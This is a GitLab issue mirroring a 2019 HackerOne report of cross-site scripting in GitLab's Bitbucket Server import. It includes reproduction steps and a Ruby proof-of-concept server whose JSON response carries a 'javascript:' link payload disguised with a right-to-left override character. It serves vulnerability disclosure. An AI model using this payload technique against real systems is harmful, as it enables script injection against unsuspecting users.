Skip to content
Snippets Groups Projects

Cross-Site Scripting In BitbucketServer Import

    • Closed Issue created by GitLab SecurityBot @gitlab-securitybot

    HackerOne report #638698 by nyangawa on 2019-07-10, assigned to estrike:

    Summary

    The BitbucketServerImport::Importer of GitLab trusts the response from a (maybe-malicious) Bitbucket server without sanitizing links of repositories. An attacker could set up a fake Bitbucket server and ask the victim to try to import repositories from it, the XSS payload could be triggered by the victim when he checks the links of the candidate repositories.

    Steps to reproduce

    1. Select "New Project" > "Import Project" > "Bitbucket Server"
    2. Fill the form, with "http://bitbucket.nyangawa.me:4567" in URL field, and random username/password.
      Screen_Shot_2019-07-10_at_1.47.49_PM.png
    3. Click the link of the first repository.
      Screen_Shot_2019-07-10_at_1.50.08_PM.png

    Description

    the source code of the PoC server is like:

    get '/rest/api/1.0/repos' do  
  content_type :json  
  repos_resp  
end

def repos_resp  
{
    "size": 1,  
    "limit": 25,  
    "isLastPage": true,  
    "values": [  
        {  
            "slug": "\"",  
            "id": 1,  
            "name": "My repo",  
            "description": "My repo description",  
            "scmId": "git",  
            "state": "AVAILABLE",  
            "statusMessage": "Available",  
            "forkable": true,  
            "project": {  
                "key": "PROJECT",  
                "id": 1,  
                "name": "My Cool Project",  
                "description": "The description for my cool project.",  
                "public": true,  
                "type": "NORMAL",  
                "links": {  
                    "self": [  
                        {  
                            "href": "http://link/to/project"  
                        }  
                    ]  
                }  
            },  
            "public": true,  
            "links": {  
                "clone": [  
                    {  
                        "href": "ssh://git@<baseURL>/PRJ/my-repo.git",  
                        "name": "ssh"  
                    },  
                    {  
                        "href": "https://<baseURL>/scm/PRJ/my-repo.git",  
                        "name": "http"  
                    }  
                ],  
                "self": [  
                    {  
                        "href": "jAvAsCrIpT:\"Click HERE!!\u202e\";alert(document.domain)"  
                    }  
                ]  
            }  
        }  
    ],  
    "start": 0  
}.to_json  
end

    \u202e in the link is used as an example of a possible obfuscation trick.

    Results of GitLab environment info

    I tested this on gitlab.com

    Impact

    It's a common XSS attacking vector, and user interactions are required to complete the attack. The attacker could use some obfuscation tricks to hide the real purpose of the payload. However, it's easy for users with caution to protect themselves from being attacked. So I think the impact is low.

    Attachments

    Warning: Attachments received through HackerOne, please exercise caution!

    Designs

      Child items ...

      2. Activity

      Please register or sign in to reply